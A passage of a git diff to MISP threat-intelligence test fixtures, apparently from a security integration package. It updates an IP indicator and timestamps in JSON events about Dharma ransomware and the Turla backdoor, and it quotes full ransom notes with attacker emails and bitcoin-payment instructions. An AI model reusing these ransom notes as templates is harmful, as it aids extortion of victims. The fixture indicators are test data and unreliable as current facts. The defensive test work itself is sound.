delivery\",\"comment\":\"\",\"deleted\":false,\"disable_correlation\":false,\"distribution\":\"5\",\"event_id\":\"3636\",\"first_seen\":null,\"id\":\"266282\",\"last_seen\":null,\"object_id\":\"18211\",\"object_relation\":\"md5\",\"sharing_group_id\":\"0\",\"timestamp\":\"1622200780\",\"to_ids\":true,\"type\":\"md5\",\"uuid\":\"f3b8696e-5390-4383-ace2-6e06bfae497d\",\"value\":\"7295463caf95534d56460bc9f360adc1\"},\"ObjectReference\":[],\"comment\":\"\",\"deleted\":false,\"description\":\"Object describing a section of a Portable 
Executable\",\"distribution\":\"5\",\"event_id\":\"3636\",\"first_seen\":null,\"id\":\"18211\",\"last_seen\":null,\"meta-category\":\"file\",\"name\":\"pe-section\",\"sharing_group_id\":\"0\",\"template_uuid\":\"198a17d2-a135-4b25-9a32-5aa4e632014a\",\"template_version\":\"3\",\"timestamp\":\"1622200780\",\"uuid\":\"023be568-34d6-4df4-ae88-f4de0dbfcd9d\"},\"Org\":{\"id\":\"1\",\"local\":true,\"name\":\"ORGNAME\",\"uuid\":\"78acad2d-cc2d-4785-94d6-b428a0070488\"},\"Orgc\":{\"id\":\"1\",\"local\":true,\"name\":\"ORGNAME\",\"uuid\":\"78acad2d-cc2d-4785-94d6-b428a0070488\"},\"RelatedEvent\":[],\"ShadowAttribute\":[],\"analysis\":\"0\",\"attribute_count\":\"9\",\"date\":\"2021-05-28\",\"disable_correlation\":false,\"distribution\":\"0\",\"event_creator_email\":\"admin@admin.test\",\"extends_uuid\":\"\",\"id\":\"3636\",\"info\":\"Test event 6 with multiple objects and multiple attributes\",\"locked\":false,\"org_id\":\"1\",\"orgc_id\":\"1\",\"proposal_email_lock\":false,\"publish_timestamp\":\"0\",\"published\":false,\"sharing_group_id\":\"0\",\"threat_level_id\":\"1\",\"timestamp\":\"1622200781\",\"uuid\":\"81aea1d1-bb23-4bcd-9b0c-496e9ce028df\"}}", "category": "threat", "type": "indicator", 
@@ -2153,7 +2153,7 @@ } }, "event": { - "ingested": "2021-10-19T14:58:39.827968194Z", + "ingested": "2021-12-09T13:49:02.949097100Z", "original": "{\"Event\":{\"Attribute\":{\"Galaxy\":[],\"ShadowAttribute\":[],\"category\":\"Artifacts dropped\",\"comment\":\"\",\"deleted\":false,\"disable_correlation\":false,\"distribution\":\"5\",\"event_id\":\"3636\",\"first_seen\":null,\"id\":\"266277\",\"last_seen\":null,\"object_id\":\"0\",\"object_relation\":null,\"sharing_group_id\":\"0\",\"timestamp\":\"1622200249\",\"to_ids\":false,\"type\":\"windows-service-name\",\"uuid\":\"3bd56a61-77f0-4885-8d1c-8bd2e39b65fb\",\"value\":\"badmojopipe\"},\"EventReport\":[],\"Galaxy\":[],\"Object\":{\"Attribute\":{\"Galaxy\":[],\"ShadowAttribute\":[],\"category\":\"Payload delivery\",\"comment\":\"\",\"deleted\":false,\"disable_correlation\":true,\"distribution\":\"5\",\"event_id\":\"3636\",\"first_seen\":null,\"id\":\"266280\",\"last_seen\":null,\"object_id\":\"18210\",\"object_relation\":\"filename\",\"sharing_group_id\":\"0\",\"timestamp\":\"1622200348\",\"to_ids\":true,\"type\":\"filename\",\"uuid\":\"2dfcb937-e6af-4b5d-ad50-f8eb975990f3\",\"value\":\"badmojopipe.exe\"},\"ObjectReference\":[],\"comment\":\"\",\"deleted\":false,\"description\":\"File object describing a file with 
meta-information\",\"distribution\":\"5\",\"event_id\":\"3636\",\"first_seen\":null,\"id\":\"18210\",\"last_seen\":null,\"meta-category\":\"file\",\"name\":\"file\",\"sharing_group_id\":\"0\",\"template_uuid\":\"688c46fb-5edb-40a3-8273-1af7923e2215\",\"template_version\":\"22\",\"timestamp\":\"1622200348\",\"uuid\":\"afe43d99-d8b6-47fa-8e7b-3d3ece2f8366\"},\"Org\":{\"id\":\"1\",\"local\":true,\"name\":\"ORGNAME\",\"uuid\":\"78acad2d-cc2d-4785-94d6-b428a0070488\"},\"Orgc\":{\"id\":\"1\",\"local\":true,\"name\":\"ORGNAME\",\"uuid\":\"78acad2d-cc2d-4785-94d6-b428a0070488\"},\"RelatedEvent\":[],\"ShadowAttribute\":[],\"analysis\":\"0\",\"attribute_count\":\"9\",\"date\":\"2021-05-28\",\"disable_correlation\":false,\"distribution\":\"0\",\"event_creator_email\":\"admin@admin.test\",\"extends_uuid\":\"\",\"id\":\"3636\",\"info\":\"Test event 6 with multiple objects and multiple attributes\",\"locked\":false,\"org_id\":\"1\",\"orgc_id\":\"1\",\"proposal_email_lock\":false,\"publish_timestamp\":\"0\",\"published\":false,\"sharing_group_id\":\"0\",\"threat_level_id\":\"1\",\"timestamp\":\"1622200781\",\"uuid\":\"81aea1d1-bb23-4bcd-9b0c-496e9ce028df\"}}", "category": "threat", "type": "indicator", diff --git a/packages/ti_misp/data_stream/threat/_dev/test/pipeline/test-misp-sample-ndjson.log b/packages/ti_misp/data_stream/threat/_dev/test/pipeline/test-misp-sample-ndjson.log index 9d5d08841fd..020dd5b27f7 100644 --- a/packages/ti_misp/data_stream/threat/_dev/test/pipeline/test-misp-sample-ndjson.log +++ b/packages/ti_misp/data_stream/threat/_dev/test/pipeline/test-misp-sample-ndjson.log 
@@ -1,8 +1,8 @@ {"Event":{"Attribute":{"Galaxy":[],"ShadowAttribute":[],"category":"Payload delivery","comment":"- Xchecked via VT: a683494fc0d017fd3b4638f8b84caaaac145cc28bc211bd7361723368b4bb21e","deleted":false,"disable_correlation":false,"distribution":"5","event_id":"5","first_seen":null,"id":"351","last_seen":null,"object_id":"0","object_relation":null,"sharing_group_id":"0","timestamp":"1503930272","to_ids":true,"type":"md5","uuid":"59a427a0-f6f8-4178-9e7d-dfd702de0b81","value":"f2679bdabe46e10edc6352fff3c829bc"},"EventReport":[],"Galaxy":[{"GalaxyCluster":[{"authors":["https://docs.google.com/spreadsheets/d/1TWS238xacAto-fLKh1n5uTsdijWdCEsGIM0Y0Hvmc5g/pubhtml","http://pastebin.com/raw/GHgpWjar","MISP Project"],"collection_uuid":"10cf658b-5d32-4c4b-bb32-61760a640372","description":"It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. CrySiS \\u003e Dharma Note: ATTENTION! At the moment, your system is not protected. We can fix it and restore files. To restore the system write to this address: bitcoin143@india.com. CrySiS variant","galaxy_id":"43","id":"6619","local":false,"meta":{"date":["November 2016"],"encryption":["AES + RSA-512"],"extensions":[".dharma",".wallet",".zzzzz",".cmb",".id-BCBEF350.[paymentbtc@firemail.cc].cmb",".bip",".id-BCBEF350.[Beamsell@qq.com].bip",".boost",".[Darknes@420blaze.it].waifu",".brrr",".adobe",".tron",".AUDIT",".cccmn",".fire",".myjob",".[cyberwars@qq.com].war",".risk",".RISK",".bkpx",".[newsantaclaus@aol.com].santa"],"payment-method":["Bitcoin - Email"],"ransomnotes":["all your data has been locked us\\nYou want to return?\\nwrite email paymentbtc@firemail.cc","All your files have been encrypted!\\nAll your files have been encrypted due to a security problem with your PC. 
If you want to restore them, write us to the e-mail paymentbtc@firemail.cc\\nWrite this ID in the title of your message ACBFF130\\nIn case of no answer in 24 hours write us to theese e-mails:paymentbtc@firemail.cc\\nYou have to pay for decryption in Bitcoins. The price depends on how fast you write to us. After payment we will send you the decryption tool that will decrypt all your files.\\nFree decryption as guarantee\\nBefore paying you can send us up to 1 file for free decryption. The total size of files must be less than 1Mb (non archived), and files should not contain valuable information. (databases,backups, large excel sheets, etc.)\\nHow to obtain Bitcoins\\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\\nhttps://localbitcoins.com/buy_bitcoins\\nAlso you can find other places to buy Bitcoins and beginners guide here:\\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/\\nAttention!\\nDo not rename encrypted files.\\nDo not try to decrypt your data using third party software, it may cause permanent data loss.\\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam.","All your files have been encrypted!\\nAll your files have been encrypted due to a security problem with your PC. If you want to restore them, write us to the e-mail Beamsell@qq.com\\nWrite this ID in the title of your message BCBEF350\\nIn case of no answer in 24 hours write us to theese e-mails:Beamsell@qq.com\\nYou have to pay for decryption in Bitcoins. The price depends on how fast you write to us. After payment we will send you the decryption tool that will decrypt all your files. \\nFree decryption as guarantee\\nBefore paying you can send us up to 1 file for free decryption. The total size of files must be less than 1Mb (non archived), and files should not contain valuable information. 
(databases,backups, large excel sheets, etc.) \\nHow to obtain Bitcoins\\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price. \\nhttps://localbitcoins.com/buy_bitcoins \\nAlso you can find other places to buy Bitcoins and beginners guide here: \\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/ \\nAttention!\\nDo not rename encrypted files. \\nDo not try to decrypt your data using third party software, it may cause permanent data loss.\\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam.","all your data has been locked us\\nYou want to return?\\nwrite email Beamsell@qq.com"],"ransomnotes-filenames":["README.txt","README.jpg","Info.hta","FILES ENCRYPTED.txt","INFO.hta"],"ransomnotes-refs":["https://www.bleepstatic.com/images/news/ransomware/d/dharma/cmb/hta-ransom-note.jpg","https://pbs.twimg.com/media/Dmof_FiXsAAAvTN.jpg","https://pbs.twimg.com/media/Dmof_FyXsAEJmgQ.jpg","https://pbs.twimg.com/media/DrWqLWzXgAc4SlG.jpg","https://pbs.twimg.com/media/DuEBIMBW0AANnGW.jpg"],"refs":["https://id-ransomware.blogspot.co.il/2016/11/dharma-ransomware.html","https://www.bleepingcomputer.com/news/security/kaspersky-releases-decryptor-for-the-dharma-ransomware/","https://www.bleepingcomputer.com/news/security/new-cmb-dharma-ransomware-variant-released/","https://www.bleepingcomputer.com/news/security/new-bip-dharma-ransomware-variant-released/","https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-october-12th-2018-notpetya-gandcrab-and-more/","https://twitter.com/demonslay335/status/1049313390097813504","https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-september-14th-2018-kraken-dharma-and-matrix/","https://twitter.com/JakubKroustek/status/1038680437508501504","https://twitter.com/demonslay335/status/1059521042383814657","https://twitter.
com/demonslay335/status/1059940414147489792","https://twitter.com/JakubKroustek/status/1060825783197933568","https://twitter.com/JakubKroustek/status/1064061275863425025","https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-november-23rd-2018-stop-dharma-and-more/","https://www.youtube.com/watch?v=qjoYtwLx2TI","https://twitter.com/GrujaRS/status/1072139616910757888"]},"source":"Various","tag_id":"23","tag_name":"misp-galaxy:ransomware=\"Dharma Ransomware\"","type":"ransomware","uuid":"2b365b2c-4a9a-4b66-804d-3b2d2814fe7b","value":"Dharma Ransomware","version":"86"}],"description":"Ransomware galaxy based on https://docs.google.com/spreadsheets/d/1TWS238xacAto-fLKh1n5uTsdijWdCEsGIM0Y0Hvmc5g/pubhtml","icon":"btc","id":"43","name":"Ransomware","namespace":"misp","type":"ransomware","uuid":"3f44af2e-1480-4b6b-9aa8-f9bb21341078","version":"4"}],"Object":[],"Org":{"id":"1","local":true,"name":"ORGNAME","uuid":"982f7c55-684d-4eb9-8736-fb5f668b899d"},"Orgc":{"id":"2","local":false,"name":"CIRCL","uuid":"55f6ea5e-2c60-40e5-964f-47a8950d210f"},"RelatedEvent":[],"ShadowAttribute":[],"Tag":[{"colour":"#0088cc","exportable":true,"hide_tag":false,"id":"23","local":0,"name":"misp-galaxy:ransomware=\"Dharma Ransomware\"","numerical_value":null,"user_id":"0"},{"colour":"#004646","exportable":true,"hide_tag":false,"id":"21","local":0,"name":"type:OSINT","numerical_value":null,"user_id":"0"},{"colour":"#ffffff","exportable":true,"hide_tag":false,"id":"2","local":0,"name":"tlp:white","numerical_value":null,"user_id":"0"},{"colour":"#2c4f00","exportable":true,"hide_tag":false,"id":"24","local":0,"name":"malware_classification:malware-category=\"Ransomware\"","numerical_value":null,"user_id":"0"},{"colour":"#00223b","exportable":true,"hide_tag":false,"id":"3","local":0,"name":"osint:source-type=\"blog - 
post\"","numerical_value":null,"user_id":"0"}],"analysis":"2","attribute_count":"7","date":"2017-08-25","disable_correlation":false,"distribution":"3","extends_uuid":"","id":"5","info":"OSINT - New Arena Crysis Ransomware Variant Released","locked":false,"org_id":"1","orgc_id":"2","proposal_email_lock":false,"publish_timestamp":"1603226331","published":true,"sharing_group_id":"0","threat_level_id":"3","timestamp":"1503930276","uuid":"59a3d08d-5dc8-4153-bc7c-456d950d210f"}} -{"Event":{"Attribute":{"id":"10794","type":"domain|ip","category":"Network activity","to_ids":false,"uuid":"5bf30242-8ef4-4c52-a2d7-0b7b0a016219","event_id":"14","distribution":"5","timestamp":"1542652482","comment":"1st stage","sharing_group_id":"0","deleted":false,"disable_correlation":false,"object_id":"0","object_relation":null,"first_seen":null,"last_seen":null,"value":"your-ip.getmyip.com|178.128.103.74","Galaxy":[],"ShadowAttribute":[]},"EventReport":[],"Galaxy":[{"GalaxyCluster":[{"authors":["https://docs.google.com/spreadsheets/d/1TWS238xacAto-fLKh1n5uTsdijWdCEsGIM0Y0Hvmc5g/pubhtml","http://pastebin.com/raw/GHgpWjar","MISP Project"],"collection_uuid":"10cf658b-5d32-4c4b-bb32-61760a640372","description":"It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. CrySiS \\u003e Dharma Note: ATTENTION! At the moment, your system is not protected. We can fix it and restore files. To restore the system write to this address: bitcoin143@india.com. 
CrySiS variant","galaxy_id":"43","id":"6619","local":false,"meta":{"date":["November 2016"],"encryption":["AES + RSA-512"],"extensions":[".dharma",".wallet",".zzzzz",".cmb",".id-BCBEF350.[paymentbtc@firemail.cc].cmb",".bip",".id-BCBEF350.[Beamsell@qq.com].bip",".boost",".[Darknes@420blaze.it].waifu",".brrr",".adobe",".tron",".AUDIT",".cccmn",".fire",".myjob",".[cyberwars@qq.com].war",".risk",".RISK",".bkpx",".[newsantaclaus@aol.com].santa"],"payment-method":["Bitcoin - Email"],"ransomnotes":["all your data has been locked us\\nYou want to return?\\nwrite email paymentbtc@firemail.cc","All your files have been encrypted!\\nAll your files have been encrypted due to a security problem with your PC. If you want to restore them, write us to the e-mail paymentbtc@firemail.cc\\nWrite this ID in the title of your message ACBFF130\\nIn case of no answer in 24 hours write us to theese e-mails:paymentbtc@firemail.cc\\nYou have to pay for decryption in Bitcoins. The price depends on how fast you write to us. After payment we will send you the decryption tool that will decrypt all your files.\\nFree decryption as guarantee\\nBefore paying you can send us up to 1 file for free decryption. The total size of files must be less than 1Mb (non archived), and files should not contain valuable information. (databases,backups, large excel sheets, etc.)\\nHow to obtain Bitcoins\\nThe easiest way to buy bitcoins is LocalBitcoins site. 
You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\\nhttps://localbitcoins.com/buy_bitcoins\\nAlso you can find other places to buy Bitcoins and beginners guide here:\\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/\\nAttention!\\nDo not rename encrypted files.\\nDo not try to decrypt your data using third party software, it may cause permanent data loss.\\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam.","All your files have been encrypted!\\nAll your files have been encrypted due to a security problem with your PC. If you want to restore them, write us to the e-mail Beamsell@qq.com\\nWrite this ID in the title of your message BCBEF350\\nIn case of no answer in 24 hours write us to theese e-mails:Beamsell@qq.com\\nYou have to pay for decryption in Bitcoins. The price depends on how fast you write to us. After payment we will send you the decryption tool that will decrypt all your files. \\nFree decryption as guarantee\\nBefore paying you can send us up to 1 file for free decryption. The total size of files must be less than 1Mb (non archived), and files should not contain valuable information. (databases,backups, large excel sheets, etc.) \\nHow to obtain Bitcoins\\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price. \\nhttps://localbitcoins.com/buy_bitcoins \\nAlso you can find other places to buy Bitcoins and beginners guide here: \\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/ \\nAttention!\\nDo not rename encrypted files. 
\\nDo not try to decrypt your data using third party software, it may cause permanent data loss.\\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam.","all your data has been locked us\\nYou want to return?\\nwrite email Beamsell@qq.com"],"ransomnotes-filenames":["README.txt","README.jpg","Info.hta","FILES ENCRYPTED.txt","INFO.hta"],"ransomnotes-refs":["https://www.bleepstatic.com/images/news/ransomware/d/dharma/cmb/hta-ransom-note.jpg","https://pbs.twimg.com/media/Dmof_FiXsAAAvTN.jpg","https://pbs.twimg.com/media/Dmof_FyXsAEJmgQ.jpg","https://pbs.twimg.com/media/DrWqLWzXgAc4SlG.jpg","https://pbs.twimg.com/media/DuEBIMBW0AANnGW.jpg"],"refs":["https://id-ransomware.blogspot.co.il/2016/11/dharma-ransomware.html","https://www.bleepingcomputer.com/news/security/kaspersky-releases-decryptor-for-the-dharma-ransomware/","https://www.bleepingcomputer.com/news/security/new-cmb-dharma-ransomware-variant-released/","https://www.bleepingcomputer.com/news/security/new-bip-dharma-ransomware-variant-released/","https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-october-12th-2018-notpetya-gandcrab-and-more/","https://twitter.com/demonslay335/status/1049313390097813504","https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-september-14th-2018-kraken-dharma-and-matrix/","https://twitter.com/JakubKroustek/status/1038680437508501504","https://twitter.com/demonslay335/status/1059521042383814657","https://twitter.com/demonslay335/status/1059940414147489792","https://twitter.com/JakubKroustek/status/1060825783197933568","https://twitter.com/JakubKroustek/status/1064061275863425025","https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-november-23rd-2018-stop-dharma-and-more/","https://www.youtube.com/watch?v=qjoYtwLx2TI","https://twitter.com/GrujaRS/status/1072139616910757888"]},"source":"Various","tag_id":"23","tag_name":"misp-galaxy:ransom
ware=\"Dharma Ransomware\"","type":"ransomware","uuid":"2b365b2c-4a9a-4b66-804d-3b2d2814fe7b","value":"Dharma Ransomware","version":"86"}],"description":"Ransomware galaxy based on https://docs.google.com/spreadsheets/d/1TWS238xacAto-fLKh1n5uTsdijWdCEsGIM0Y0Hvmc5g/pubhtml","icon":"btc","id":"43","name":"Ransomware","namespace":"misp","type":"ransomware","uuid":"3f44af2e-1480-4b6b-9aa8-f9bb21341078","version":"4"}],"Object":[],"Org":{"id":"1","local":true,"name":"ORGNAME","uuid":"982f7c55-684d-4eb9-8736-fb5f668b899d"},"Orgc":{"id":"2","local":false,"name":"CIRCL","uuid":"55f6ea5e-2c60-40e5-964f-47a8950d210f"},"RelatedEvent":[],"ShadowAttribute":[],"Tag":[{"colour":"#0088cc","exportable":true,"hide_tag":false,"id":"23","local":0,"name":"misp-galaxy:ransomware=\"Dharma Ransomware\"","numerical_value":null,"user_id":"0"},{"colour":"#004646","exportable":true,"hide_tag":false,"id":"21","local":0,"name":"type:OSINT","numerical_value":null,"user_id":"0"},{"colour":"#ffffff","exportable":true,"hide_tag":false,"id":"2","local":0,"name":"tlp:white","numerical_value":null,"user_id":"0"},{"colour":"#2c4f00","exportable":true,"hide_tag":false,"id":"24","local":0,"name":"malware_classification:malware-category=\"Ransomware\"","numerical_value":null,"user_id":"0"},{"colour":"#00223b","exportable":true,"hide_tag":false,"id":"3","local":0,"name":"osint:source-type=\"blog - post\"","numerical_value":null,"user_id":"0"}],"analysis":"2","attribute_count":"7","date":"2017-08-25","disable_correlation":false,"distribution":"3","extends_uuid":"","id":"5","info":"OSINT - New Arena Crysis Ransomware Variant Released","locked":false,"org_id":"1","orgc_id":"2","proposal_email_lock":false,"publish_timestamp":"1603226331","published":true,"sharing_group_id":"0","threat_level_id":"3","timestamp":"1503930276","uuid":"59a3d08d-5dc8-4153-bc7c-456d950d210f"}} +{"Event":{"Attribute":{"id":"10794","type":"domain|ip","category":"Network 
activity","to_ids":false,"uuid":"5bf30242-8ef4-4c52-a2d7-0b7b0a016219","event_id":"14","distribution":"5","timestamp":"1542652482","comment":"1st stage","sharing_group_id":"0","deleted":false,"disable_correlation":false,"object_id":"0","object_relation":null,"first_seen":null,"last_seen":null,"value":"your-ip.getmyip.com|89.160.20.156","Galaxy":[],"ShadowAttribute":[]},"EventReport":[],"Galaxy":[{"GalaxyCluster":[{"authors":["https://docs.google.com/spreadsheets/d/1TWS238xacAto-fLKh1n5uTsdijWdCEsGIM0Y0Hvmc5g/pubhtml","http://pastebin.com/raw/GHgpWjar","MISP Project"],"collection_uuid":"10cf658b-5d32-4c4b-bb32-61760a640372","description":"It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. CrySiS \\u003e Dharma Note: ATTENTION! At the moment, your system is not protected. We can fix it and restore files. To restore the system write to this address: bitcoin143@india.com. CrySiS variant","galaxy_id":"43","id":"6619","local":false,"meta":{"date":["November 2016"],"encryption":["AES + RSA-512"],"extensions":[".dharma",".wallet",".zzzzz",".cmb",".id-BCBEF350.[paymentbtc@firemail.cc].cmb",".bip",".id-BCBEF350.[Beamsell@qq.com].bip",".boost",".[Darknes@420blaze.it].waifu",".brrr",".adobe",".tron",".AUDIT",".cccmn",".fire",".myjob",".[cyberwars@qq.com].war",".risk",".RISK",".bkpx",".[newsantaclaus@aol.com].santa"],"payment-method":["Bitcoin - Email"],"ransomnotes":["all your data has been locked us\\nYou want to return?\\nwrite email paymentbtc@firemail.cc","All your files have been encrypted!\\nAll your files have been encrypted due to a security problem with your PC. 
If you want to restore them, write us to the e-mail paymentbtc@firemail.cc\\nWrite this ID in the title of your message ACBFF130\\nIn case of no answer in 24 hours write us to theese e-mails:paymentbtc@firemail.cc\\nYou have to pay for decryption in Bitcoins. The price depends on how fast you write to us. After payment we will send you the decryption tool that will decrypt all your files.\\nFree decryption as guarantee\\nBefore paying you can send us up to 1 file for free decryption. The total size of files must be less than 1Mb (non archived), and files should not contain valuable information. (databases,backups, large excel sheets, etc.)\\nHow to obtain Bitcoins\\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\\nhttps://localbitcoins.com/buy_bitcoins\\nAlso you can find other places to buy Bitcoins and beginners guide here:\\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/\\nAttention!\\nDo not rename encrypted files.\\nDo not try to decrypt your data using third party software, it may cause permanent data loss.\\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam.","All your files have been encrypted!\\nAll your files have been encrypted due to a security problem with your PC. If you want to restore them, write us to the e-mail Beamsell@qq.com\\nWrite this ID in the title of your message BCBEF350\\nIn case of no answer in 24 hours write us to theese e-mails:Beamsell@qq.com\\nYou have to pay for decryption in Bitcoins. The price depends on how fast you write to us. After payment we will send you the decryption tool that will decrypt all your files. \\nFree decryption as guarantee\\nBefore paying you can send us up to 1 file for free decryption. The total size of files must be less than 1Mb (non archived), and files should not contain valuable information. 
(databases,backups, large excel sheets, etc.) \\nHow to obtain Bitcoins\\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price. \\nhttps://localbitcoins.com/buy_bitcoins \\nAlso you can find other places to buy Bitcoins and beginners guide here: \\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/ \\nAttention!\\nDo not rename encrypted files. \\nDo not try to decrypt your data using third party software, it may cause permanent data loss.\\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam.","all your data has been locked us\\nYou want to return?\\nwrite email Beamsell@qq.com"],"ransomnotes-filenames":["README.txt","README.jpg","Info.hta","FILES ENCRYPTED.txt","INFO.hta"],"ransomnotes-refs":["https://www.bleepstatic.com/images/news/ransomware/d/dharma/cmb/hta-ransom-note.jpg","https://pbs.twimg.com/media/Dmof_FiXsAAAvTN.jpg","https://pbs.twimg.com/media/Dmof_FyXsAEJmgQ.jpg","https://pbs.twimg.com/media/DrWqLWzXgAc4SlG.jpg","https://pbs.twimg.com/media/DuEBIMBW0AANnGW.jpg"],"refs":["https://id-ransomware.blogspot.co.il/2016/11/dharma-ransomware.html","https://www.bleepingcomputer.com/news/security/kaspersky-releases-decryptor-for-the-dharma-ransomware/","https://www.bleepingcomputer.com/news/security/new-cmb-dharma-ransomware-variant-released/","https://www.bleepingcomputer.com/news/security/new-bip-dharma-ransomware-variant-released/","https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-october-12th-2018-notpetya-gandcrab-and-more/","https://twitter.com/demonslay335/status/1049313390097813504","https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-september-14th-2018-kraken-dharma-and-matrix/","https://twitter.com/JakubKroustek/status/1038680437508501504","https://twitter.com/demonslay335/status/1059521042383814657","https://twitter.
com/demonslay335/status/1059940414147489792","https://twitter.com/JakubKroustek/status/1060825783197933568","https://twitter.com/JakubKroustek/status/1064061275863425025","https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-november-23rd-2018-stop-dharma-and-more/","https://www.youtube.com/watch?v=qjoYtwLx2TI","https://twitter.com/GrujaRS/status/1072139616910757888"]},"source":"Various","tag_id":"23","tag_name":"misp-galaxy:ransomware=\"Dharma Ransomware\"","type":"ransomware","uuid":"2b365b2c-4a9a-4b66-804d-3b2d2814fe7b","value":"Dharma Ransomware","version":"86"}],"description":"Ransomware galaxy based on https://docs.google.com/spreadsheets/d/1TWS238xacAto-fLKh1n5uTsdijWdCEsGIM0Y0Hvmc5g/pubhtml","icon":"btc","id":"43","name":"Ransomware","namespace":"misp","type":"ransomware","uuid":"3f44af2e-1480-4b6b-9aa8-f9bb21341078","version":"4"}],"Object":[],"Org":{"id":"1","local":true,"name":"ORGNAME","uuid":"982f7c55-684d-4eb9-8736-fb5f668b899d"},"Orgc":{"id":"2","local":false,"name":"CIRCL","uuid":"55f6ea5e-2c60-40e5-964f-47a8950d210f"},"RelatedEvent":[],"ShadowAttribute":[],"Tag":[{"colour":"#0088cc","exportable":true,"hide_tag":false,"id":"23","local":0,"name":"misp-galaxy:ransomware=\"Dharma Ransomware\"","numerical_value":null,"user_id":"0"},{"colour":"#004646","exportable":true,"hide_tag":false,"id":"21","local":0,"name":"type:OSINT","numerical_value":null,"user_id":"0"},{"colour":"#ffffff","exportable":true,"hide_tag":false,"id":"2","local":0,"name":"tlp:white","numerical_value":null,"user_id":"0"},{"colour":"#2c4f00","exportable":true,"hide_tag":false,"id":"24","local":0,"name":"malware_classification:malware-category=\"Ransomware\"","numerical_value":null,"user_id":"0"},{"colour":"#00223b","exportable":true,"hide_tag":false,"id":"3","local":0,"name":"osint:source-type=\"blog - 
post\"","numerical_value":null,"user_id":"0"}],"analysis":"2","attribute_count":"7","date":"2017-08-25","disable_correlation":false,"distribution":"3","extends_uuid":"","id":"5","info":"OSINT - New Arena Crysis Ransomware Variant Released","locked":false,"org_id":"1","orgc_id":"2","proposal_email_lock":false,"publish_timestamp":"1603226331","published":true,"sharing_group_id":"0","threat_level_id":"3","timestamp":"1503930276","uuid":"59a3d08d-5dc8-4153-bc7c-456d950d210f"}} {"Event":{"Attribute":{"Galaxy":[],"ShadowAttribute":[],"category":"External analysis","comment":"Carbon sample - Xchecked via VT: a08b8371ead1919500a4759c2f46553620d5a9d9","deleted":false,"disable_correlation":false,"distribution":"5","event_id":"4","first_seen":null,"id":"342","last_seen":null,"object_id":"0","object_relation":null,"sharing_group_id":"0","timestamp":"1490878550","to_ids":false,"type":"link","uuid":"58dd0056-6e74-43d5-b58b-494802de0b81","value":"https://www.virustotal.com/file/7fa4482bfbca550ce296d8e791b1091d60d733ea8042167fd0eb853530584452/analysis/1486030116/"},"EventReport":[],"Galaxy":[{"GalaxyCluster":[{"authors":["Alexandre Dulaunoy","Florian Roth","Timo Steffens","Christophe Vandeplas","Dennis Rand","raw-data"],"collection_uuid":"0d821b68-9d82-4c6d-86a6-1071a9e0f79f","description":"Family of related sophisticated backdoor software - Name comes from Microsoft detection signature – anagram of Ultra (Ultra3) was a name of the fake driver). 
A macOS version exists but appears incomplete and lacking features...for now!","galaxy_id":"36","id":"5828","local":false,"meta":{"refs":["https://www.first.org/resources/papers/tbilisi2014/turla-operations_and_development.pdf","https://objective-see.com/blog/blog_0x25.html#Snake"],"synonyms":["Snake","Uroburos","Urouros"],"type":["Backdoor","Rootkit"]},"source":"MISP Project","tag_id":"22","tag_name":"misp-galaxy:tool=\"Turla\"","type":"tool","uuid":"22332d52-c0c2-443c-9ffb-f08c0d23722c","value":"Turla","version":"138"}],"description":"Threat actors tools is an enumeration of tools used by adversaries. The list includes malware but also common software regularly used by the adversaries.","icon":"optin-monster","id":"36","name":"Tool","namespace":"misp","type":"tool","uuid":"9b8037f7-bc8f-4de1-a797-37266619bc0b","version":"3"}],"Object":[],"Org":{"id":"1","local":true,"name":"ORGNAME","uuid":"982f7c55-684d-4eb9-8736-fb5f668b899d"},"Orgc":{"id":"2","local":false,"name":"CIRCL","uuid":"55f6ea5e-2c60-40e5-964f-47a8950d210f"},"RelatedEvent":[{"Event":{"Org":{"id":"1","name":"ORGNAME","uuid":"982f7c55-684d-4eb9-8736-fb5f668b899d"},"Orgc":{"id":"4","name":"CthulhuSPRL.be","uuid":"55f6ea5f-fd34-43b8-ac1d-40cb950d210f"},"analysis":"2","date":"2015-01-20","distribution":"3","id":"369","info":"OSINT Analysis of Project Cobra Another extensible framework used by the Uroburos’ actors from 